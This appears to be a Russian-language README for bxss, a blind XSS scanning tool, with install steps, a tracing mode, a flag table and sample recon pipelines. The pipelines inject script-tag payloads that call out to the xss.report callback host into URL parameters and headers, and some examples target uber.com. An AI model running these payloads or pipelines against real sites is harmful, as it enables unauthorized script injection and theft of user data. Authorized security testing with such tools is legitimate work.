
Blind XSS Scanner — это инструмент, который можно использовать для сканирования слепых XSS-уязвимостей в веб-приложениях.
Bxss — это высокопроизводительный сканер Blind XSS, автоматизирующий обнаружение слепых XSS-уязвимостей в веб-приложениях.
Мы активно работаем над интеграцией пула воркеров на основе Chromium для повышения производительности bxss на устройствах с низкой производительностью.
Эта функция позволит выгружать ресурсоёмкие задачи, такие как обнаружение DOM-based XSS или проверка полезной нагрузки после срабатывания, на лёгкие экземпляры Chromium, управляемые через пул. Распределяя нагрузку между несколькими контекстами безголового браузера контролируемым и эффективным образом, bxss останется отзывчивым и удобным даже на машинах с низкими характеристиками.
Это сделает bxss не только мощным, но и высокодоступным, независимо от системных ограничений.
go install -v github.com/ethicalhackingplayground/bxss/v2/cmd/bxss@latest
Режим трассировки — это экспериментальная функция, которая позволяет отследить, где сработал BlindXSS. Некоторые сторонние платформы BlindXSS, такие как https://xss.report/, позволяют задавать пользовательские параметры в ваших полезных нагрузках. Это позволяет отследить, где сработал BlindXSS. Например, если вы укажете параметр url=https://somehost.com в вашей полезной нагрузке, инструмент будет использовать полезную нагрузку
'"><script src=https://xss.report/c/username?url=https://somehost.com></script>'
для тестирования, и при срабатывании вы сможете проверить DOM и увидеть, с какого хоста сработал BlindXSS.
Убедитесь, что при назначении пользовательских параметров в вашей панели управления вы указываете url={LINK}, чтобы bxss мог автоматически заменять {LINK} на фактический URL.
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-t
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-t
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t
subfinder -d uber.com \
| gau \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "X-Forwarded-For"
echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t
curl -X GET -H "Authorization: Bearer <Token>" \
-H "X-Secret-Key: <Secret>" \
https://dorki.attaxa.com/api/search?q=site:example.com -s \
| jq -r .[][].url \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>'
echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t \
-rl 10
Для продвинутого поиска уязвимостей с помощью dorking посетите Dorki и зарегистрируйтесь сегодня!
Если вы получили вознаграждение с помощью этого инструмента, подумайте о поддержке — купите мне кофе!
| Аргумент | Описание | По умолчанию |
|---|
-a | Добавить полезную нагрузку к параметру | false |
-c int | Установить уровень параллелизма | 30 |
-H string | Установить пользовательский заголовок | "" |
-hf string | Путь к файлу с заголовками | "" |
-p string | Полезная нагрузка Blind XSS | "" |
-pf string | Путь к файлу с полезными нагрузками | "" |
-t | Тестировать параметры на Blind XSS | false |
-X string | Используемый HTTP-метод | "" |
-v | Включить режим отладки | false |
-rl float | Лимит запросов (запросов в секунду) | 0 |
-f | Следовать перенаправлениям | false |
-l | Включить режим трассировки (экспериментальный) | false |